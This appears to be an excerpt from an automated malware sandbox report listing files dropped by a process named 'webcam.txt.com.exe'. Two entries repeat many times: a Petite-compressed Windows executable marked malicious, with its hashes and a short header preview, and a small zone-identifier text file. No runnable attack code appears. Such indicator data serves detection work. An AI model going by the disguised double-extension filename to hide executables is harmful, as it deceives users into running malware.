                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
